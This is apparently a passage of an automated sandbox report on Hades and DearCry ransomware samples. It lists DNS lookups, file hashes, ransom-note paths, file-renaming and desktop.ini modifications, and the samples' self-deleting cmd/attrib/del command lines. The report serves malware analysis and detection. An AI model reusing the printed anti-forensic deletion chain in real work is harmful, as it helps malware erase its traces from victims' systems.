| US | 8.8.8.8:53 | 14.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 132.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/3656-1-0x00007FF841003000-0x00007FF841005000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4ckz4me.vlp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3656-11-0x000002089FF90000-0x000002089FFB2000-memory.dmp
memory/3656-12-0x00007FF841000000-0x00007FF841AC1000-memory.dmp
memory/3656-13-0x00007FF841000000-0x00007FF841AC1000-memory.dmp
memory/3656-16-0x00007FF841000000-0x00007FF841AC1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 556084f2c6d459c116a69d6fedcc4105 |
| SHA1 | 633e89b9a1e77942d822d14de6708430a3944dbc |
| SHA256 | 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8 |
| SHA512 | 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f58e73a5c43b0713d39bb6cca4251670 |
| SHA1 | ece141754053a0d3855b7270a9569601e99dbbf6 |
| SHA256 | f374315ca436a4f0505cdc56d043e1176df91064603a38001902cf596262d015 |
| SHA512 | 1872b460e63288eabd785e10c76ee0b35bb9c37891193ad4ac0992e37f2fd6d9e692cea26ceec58b219b892910825e80d8e009c161d36735eb1dd839d4622ee8 |
C:\Users\Admin\README.5a727a6e.TXT
| MD5 | d4e176b40c4ea17f4870c34fad926d6e |
| SHA1 | 2cc3e4c6cf00e4a2ac0e16e9f7b0ccf2421b92e0 |
| SHA256 | 7ee422c323ddbda59934ed7bfa6217cfe06bdb50165b7d4b6115475f1df7af0c |
| SHA512 | feaa913ae99db210db088423a9813e1efedd89d80817bf485a4d9f8ea349b86932ac16ba0473bd224ff150603507bd289d01aebc1a702372a076a167b632f471 |
Analysis: behavioral26
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:40
Platform
win10v2004-20240508-en
Max time kernel
1751s
Max time network
1764s
Command Line
Signatures
Hades Ransomware
Hades payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
CryptOne packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (160) files with added filename extension
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\DsDownload\Serv | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Users\Admin\AppData\Roaming\DsDownload\Serv
C:\Users\Admin\AppData\Roaming\DsDownload\Serv /go
C:\Windows\SYSTEM32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & del "C:\Users\Admin\AppData\Roaming\DsDownload\Serv" & rd "C:\Users\Admin\AppData\Roaming\DsDownload\"
C:\Windows\SYSTEM32\cmd.exe
cmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & del "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe" & rd "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\"
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hades_29_03_2021_1909KB.exe"
C:\Windows\system32\waitfor.exe
waitfor /t 10 pause /d y
C:\Windows\system32\attrib.exe
attrib -h "C:\Users\Admin\AppData\Roaming\DsDownload\Serv"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/4864-0-0x0000000002020000-0x00000000021E2000-memory.dmp
memory/4864-1-0x0000000140000000-0x00000001401E2000-memory.dmp
C:\Users\Admin\AppData\Roaming\DsDownload\Serv
| MD5 | 9fa1ba3e7d6e32f240c790753cdaaf8e |
| SHA1 | 7bcea3fbfcb4c170c57c9050499e1fae40f5d731 |
| SHA256 | fe997a590a68d98f95ac0b6c994ba69c3b2ece9841277b7fecd9dfaa6f589a87 |
| SHA512 | 8d2fb58cb8776ead15f445671431eae13a00b48921e545c7ecbf91829015d818d663d9369f181de669ebb771b113c2f675c3a156fac5ede019b5fad9cb8c65fe |
memory/4864-8-0x0000000140000000-0x00000001401E2000-memory.dmp
memory/2456-10-0x0000000002080000-0x0000000002242000-memory.dmp
memory/2456-11-0x0000000140000000-0x00000001401E2000-memory.dmp
C:\Users\Admin\Desktop\HOW-TO-DECRYPT-gn9cj.txt
| MD5 | 0c6d0a67b942d06fe27f41c7c582cdfe |
| SHA1 | 7e674cf6375b138cabca2706583d4ced7a1aef27 |
| SHA256 | 014ea5effc97085b7832512b9ad2a5c4487265eb67e8d7b0920ef2bc8768400c |
| SHA512 | 53ec4509bc58f53419a8923d808c7dfdecf57dc203c37265d061aebab73147720d1c419e79578065a42c3b2a63504370f90516c3f0afad5d6997952592d3a39c |
memory/2456-343-0x0000000002080000-0x0000000002242000-memory.dmp
memory/2456-342-0x0000000140000000-0x00000001401E2000-memory.dmp
memory/4864-345-0x0000000002020000-0x00000000021E2000-memory.dmp
memory/4864-344-0x0000000140000000-0x00000001401E2000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-07-07 14:07
Reported
2024-07-07 14:39
Platform
win7-20240704-en
Max time kernel
1440s
Max time network
1449s
Command Line
Signatures
DearCry
Renames multiple (3331) files with added filename extension
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\UGUBWRQR\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\FreeCell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CGY9ZAGI\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\OORJZY5Z\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links for United States\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Music\Sample Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\U42VY3XA\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Public\Recorded TV\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Games\Mahjong\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4NH6FMWO\desktop.ini | C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe | N/A |
